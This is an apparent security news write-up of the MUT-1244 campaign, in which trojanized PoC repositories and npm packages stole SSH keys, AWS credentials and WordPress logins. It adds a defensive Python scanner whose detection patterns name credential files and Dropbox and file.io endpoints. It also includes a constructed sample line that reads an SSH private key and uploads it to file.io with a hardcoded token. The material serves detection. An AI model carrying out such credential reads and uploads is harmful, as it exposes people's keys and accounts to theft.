Overview

A sophisticated cyber campaign has resulted in the theft of over 390,000 WordPress credentials. A group known as MUT-1244 orchestrated this extensive year-long operation, targeting both malicious actors and cybersecurity professionals through a compromised WordPress credential utility.

Research Discovery

Datadog Security Labs identified the attack, noting that additional sensitive data—including SSH private keys and AWS access credentials—were compromised across numerous victims.

Victims

This breach has affected red teamers, penetration testers, security researchers, and other threat actors.

Trojanized Repositories

The attackers deployed a second-stage payload via multiple GitHub repositories containing malicious proof-of-concept (PoC) exploits. These exploits targeted known vulnerabilities.

Phishing Tactics

Victims received fraudulent emails instructing them to install what appeared to be a legitimate CPU microcode update; in reality it was a fake kernel upgrade that installed the malware.

Payload Delivery

Methods included backdoored configuration files, malicious PDFs, Python droppers, and compromised npm packages.

Broader Implications

The attackers exploited trusted channels within the cybersecurity community to mask their operations. Fake PoC exploits significantly enhanced the perceived legitimacy of the repositories, increasing the likelihood that they would be used. This in turn spread the malicious payload further, compromising cybersecurity practitioners and threat actors alike.

Previous Campaign Links

The campaign aligns with an earlier attack detailed in a Checkmarx report from November. The same GitHub project, "hpc20235/yawpp," was used, involving the "0xengine/xmlrpc" npm package for data theft and cryptocurrency mining.

Malware Functionality

The malware involved included a cryptocurrency miner and backdoor capabilities to harvest and exfiltrate private SSH keys, AWS credentials, and other sensitive environment data.

Exfiltration Techniques

Stolen data was transferred to platforms such as Dropbox and file.io using hardcoded credentials included in the payload, providing easy access for the attackers.
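The Malware Functionality and Exfiltration Techniques sections above describe one pattern a defender can triage for before running a downloaded PoC or npm package: code that reads credential stores (SSH keys, AWS credentials, environment variables) and also talks to Dropbox or file.io with a hardcoded token. The following is an added example, not code from the Datadog report or from any project the page names; the pattern names, the file extensions scanned and the sample dropper text are constructed assumptions, and the heuristics are deliberately simple.

```python
"""Pre-install triage: flag files that combine credential access with known exfil endpoints."""
import os
import re

# Credential locations the campaign is reported to harvest (SSH keys, AWS creds, env data).
CREDENTIAL_PATTERNS = {
    "ssh_private_key_path": re.compile(r"\.ssh[/\\]id_(?:rsa|ed25519|ecdsa|dsa)\b"),
    "aws_credentials_file": re.compile(r"\.aws[/\\]credentials\b"),
    "aws_env_var": re.compile(r"AWS_(?:SECRET_ACCESS_KEY|ACCESS_KEY_ID)\b"),
    "env_dump": re.compile(r"\b(?:os\.environ|process\.env|printenv)\b"),
}
# Exfiltration destinations named on the page, plus a heuristic for a hardcoded bearer token.
EXFIL_PATTERNS = {
    "dropbox_api": re.compile(r"\b(?:content|api)\.dropboxapi\.com\b|\bdropbox\.com\b"),
    "file_io": re.compile(r"\bfile\.io\b"),
    "hardcoded_bearer": re.compile(r"Bearer\s+[A-Za-z0-9._\-]{20,}"),
}

def scan_text(text):
    """Return which indicator groups matched; 'suspicious' needs both groups to co-occur."""
    cred = [name for name, pat in CREDENTIAL_PATTERNS.items() if pat.search(text)]
    exfil = [name for name, pat in EXFIL_PATTERNS.items() if pat.search(text)]
    return {"credential": cred, "exfil": exfil, "suspicious": bool(cred and exfil)}

def scan_tree(root, exts=(".py", ".js", ".ts", ".sh", ".json")):
    """Walk an extracted repo or package and return {path: result} for files with any hit."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="ignore") as fh:
                    result = scan_text(fh.read())
            except OSError:
                continue  # unreadable file: skip rather than abort the whole scan
            if result["credential"] or result["exfil"]:
                hits[path] = result
    return hits

# Constructed sample resembling a PoC "helper" script; inert text, not real malware.
SAMPLE_DROPPER = """
key_path = '~/.ssh/id_rsa'
upload(read(key_path), 'https://file.io', auth='Bearer EXAMPLEtoken0123456789abcdef')
"""

if __name__ == "__main__":
    print(scan_text(SAMPLE_DROPPER))
```

Run scan_tree on the unpacked repository or npm tarball directory and review any path marked suspicious before installing or executing anything from it.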

Current Status and Ongoing Threat

MUT-1244 managed to validate stolen WordPress credentials through the compromised "yawpp" tool, a so-called "credentials checker," gaining the trust of cyber actors seeking to verify illicitly obtained data. Trust within the cybersecurity domain was leveraged to infiltrate systems belonging to both legitimate and illegitimate users, leading to an expansive data breach that included SSH keys and AWS tokens. Datadog Security Labs warns that hundreds of systems are likely still compromised, with new infections continuing as the campaign persists. This campaign underscores the necessity for vigilance and proactive measures within the cybersecurity community.
